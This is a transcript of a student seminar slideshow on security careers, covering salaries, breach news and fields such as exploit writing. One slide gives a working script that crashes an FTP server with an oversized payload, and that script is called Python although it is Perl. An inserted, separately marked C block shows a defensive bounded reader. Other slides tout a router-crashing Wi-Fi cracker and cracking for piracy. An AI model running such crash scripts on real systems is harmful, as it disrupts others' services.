Beyond Ethical Hacking by Nipun Jaswal, CSA, HCF Infosec Pvt. Ltd

Life Beyond Ethical Hacking: “The Actual Information Security” By: Nipun Jaswal (CSA, HCF Infosec Pvt. Ltd.)

Upload: nipun-jaswal

Post on 13-May-2015


DESCRIPTION

Presentation on topics beyond conventional ethical hacking; discusses job factors and scope in the security field :) This was presented at LPU (Lovely Professional University) as a seminar with over 200 attendees. Meet me at FB if u want it: fb/nipun.jaswal

TRANSCRIPT

Page 1: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

Life Beyond Ethical Hacking: “The Actual Information Security” By: Nipun Jaswal (CSA, HCF Infosec Pvt. Ltd.)

Page 2: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

Acknowledgements

Dr. H.S Johal
Ms. Himanshi

Page 3: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

Lil About My Self

• Certified with C|EH, CISE, AFCEH
• Associated with over 9 companies
• Ambassador, EC-COUNCIL
• Creator of India’s first DLP on Web Application Penetration Testing Course
• Student @ LPU
• Tested over 90+ servers
• Currently working as Chief Security Analyst at HCF Infosec Pvt. Ltd

Page 4: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

Let's Go Old School: What is Ethical Hacking?

• Breaking into devices and networks legally.
• Securing servers, recovering emails etc.

But the question remains! Where to get these jobs?

Page 5: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

Jobs And Stats

Page 6: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

Why More Jobs and Less People ?

• Emerging Technology
• Still Register Work
• Don’t want to spend money
• Find it too difficult
• People feel they can learn hacking in 2 days workshop :-P
• No proper facilities of required courses

Page 7: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

Salary Packages

• Normal B.Tech: 300K-400K
• BPO: 100K-250K
• Development: 300K-700K
• Security: 600K-1300K

Page 8: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

• Web Application Penetration Testing
• Exploit Writing
• Reverse Engineering
• Malware Analysis
• Computer Forensics
• Protocol Analysis

Beyond So Called “Ethical Hacking”

Page 9: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

Jobs For Ethical Hacker:
• Trainer
• Trainer
• Trainer
• Trainer
• And Trainer
Salary Around: 15K + Incentives

Why To Go Beyond Ethical Hacking?

Page 10: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

Jobs For Hackers:
• Researchers
• Technical Heads
• Penetration Testers
• Forensic Investigators
Salary Around: 300-400K Per Month

Jobs Beyond Ethical Hacking:-

Page 11: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

Benefits of not Being a Hacker

Page 12: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

Benefits of Being a Hacker

I M UR WORST NIGHTMARE :-P

Page 13: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

How To Let Your Dreams Come True?

Some Highly Paid Fields:
• WAPT – Involves testing of web applications, websites, servers, and source code auditing.
• Exploit Writing – Finding vulnerabilities in software and possibly exploiting the software.
• Reverse Engineering – Software cracking, patches, modifying features of an end product.

Page 14: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

How To Let Your Dreams Come True?

Some Highly Paid Fields:
• Wireless Testing – Involves network security infrastructure build-up, managing networks, system administration etc.
• Projects – Good at coding? Show it to the whole world.
• Forensics – Highest paid job in the entire list. Takes a lot, and pays a lot.

Page 15: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

Why We Need More People ?

Source: Indian Express

Page 16: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

Why We Need More People ?

Source: Times Of India

Page 17: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

Host Gator Hacked !! 3 Lac Websites Owned By Hackers

Source: SoftPedia

Page 18: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

Host Gator Hacked !! 3 Lac Websites Owned By Hackers Contd..

Source: Private

Page 19: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

Norton India Hacked !!

Source: Private

Page 20: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

Norton India’s Database Hacked !!

Source: Private

Page 21: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

Norton India’s Database Hacked !!

Source: Private

Page 22: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

The Biggest Of All… Anonymous!!

Source: National Post

Page 23: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

Now Beyond The Word ‘Ethical’

Web Application Penetration Testing:
• Find bugs in web applications: custom made and open source applications.
• Bugs which may compromise the security, make it vulnerable, or help an attacker steal sensitive information.
• Now, how to perform 1 out of 300 tests in a web application pen-test?
• Let's see a simple example – SQL Injection Bypass

Page 24: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

Rise Of The Web Applications

Page 25: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

Fasten Your Seat Belts , Its Showtime

DEMO

Page 26: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

Now Beyond The Word ‘Ethical’

Exploit Writing
• Potentially writing code to exploit a vulnerability.
• Highly paid: software is vulnerable to exploits, which may further lead to compromise of the entire system.
• Requirement: C, C++, Perl, Python, Ruby, Assembly language

Page 27: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

Now Beyond The Word ‘Ethical’

Simplest of The Exploit in Python- Crashing A Secure Port FTP Server

use strict;
use Socket;

my $junk  = "\x41" x 1000;              # payload: 1000 'A' bytes
my $host  = shift || '192.168.15.1';    # target host (first argument)
my $port  = shift || 200;               # target port (second argument)
my $proto = getprotobyname('tcp');
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($port, $iaddr);

print "[+] Setting up socket\n";
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
print "[+] Connecting to $host on port $port\n";
connect(SOCKET, $paddr) or die "connect: $!";
print "[+] Sending payload\n";
print SOCKET $junk."\n";                # one over-long line, then newline
print "[+] Payload sent\n";
close SOCKET or die "close: $!";
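The server-side view of the slide above, as an added example that is not part of the original presentation: a bounded command reader that rejects the 1000-byte line instead of copying it into a fixed buffer. It assumes the crash comes from an unchecked copy of the received line; the slides do not state the cause, and CMD_MAX, read_command and demo_oversized are hypothetical names.

```c
#include <stddef.h>
#include <string.h>

#define CMD_MAX 512  /* assumed per-command limit; not taken from the slides */

/* Outcome of trying to extract one command line from received bytes. */
enum cmd_status { CMD_OK, CMD_INCOMPLETE, CMD_TOO_LONG };

/*
 * Copy one newline-terminated command from buf[0..len) into out.
 * The unsafe pattern this replaces is strcpy()/sprintf() of the received
 * line into a fixed stack buffer, which a 1000-byte line would overrun.
 */
enum cmd_status read_command(const char *buf, size_t len,
                             char *out, size_t outsz, size_t *consumed)
{
    const char *nl = memchr(buf, '\n', len);
    *consumed = 0;
    if (nl == NULL) {
        /* No terminator yet: refuse to keep buffering past the limit. */
        return len >= CMD_MAX ? CMD_TOO_LONG : CMD_INCOMPLETE;
    }
    size_t linelen = (size_t)(nl - buf);
    *consumed = linelen + 1;          /* the line is dropped either way */
    if (linelen > 0 && buf[linelen - 1] == '\r')
        linelen--;                    /* FTP command lines end in CRLF */
    if (linelen >= outsz || linelen >= CMD_MAX)
        return CMD_TOO_LONG;          /* caller answers with an error reply */
    memcpy(out, buf, linelen);
    out[linelen] = '\0';
    return CMD_OK;
}

/* Constructed input: the 1000 x 'A' line plus newline sent by the script. */
enum cmd_status demo_oversized(void)
{
    char wire[1001], cmd[CMD_MAX];
    size_t used;
    memset(wire, 'A', 1000);
    wire[1000] = '\n';
    return read_command(wire, sizeof wire, cmd, sizeof cmd, &used);
}

int main(void)
{
    /* Exit status 0 when the oversized line is rejected. */
    return demo_oversized() == CMD_TOO_LONG ? 0 : 1;
}
```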


Page 29: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

Now Beyond The Word ‘Ethical’

Prices for Various Exploits

Page 30: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

Now Beyond The Word ‘Ethical’

Reverse Engineering
• Editing the final software to find serial keys, stop the online authentications
• Mostly used by pirates
• Sometimes used to edit the features of a final software
• Make your life easier with free products

Page 31: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

Now Beyond The Word ‘Ethical’

Wireless Penetration Testing
• Involves auditing of network security over wireless
• Installation of servers and security devices
• Crack-proofing wireless passwords
• Highly paid
• Requires networking background

Page 32: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

INSANITY WIFI CRACKER

Insanity Wi-fi Cracker
• Developed by me and my friends for minor project
• Automates the cracking of various wifi securities
• Performs self MITM attack
• DOS Service Can Crash the Routers For Ever :-P
• Even an 8 year old can press the button ‘c’ for cracking and no. for a particular AP to crack

Page 33: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

Wi-fi Cracking At a Click Of a Button

DEMO

Page 34: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

So A One Last Question , Wanna go this ?

Page 35: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

Or Wanna Go This ?

Page 36: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

After All
It’s your Career

|Handle it with care|

Page 37: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

Any Questions ?

Page 38: Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

Contact

Email : [email protected]/nipun.jaswal
www.hatcon.in
www.hcf.co.in
www.starthack.com
www.cyber-rog.com/h3ll
www.pentest.co.in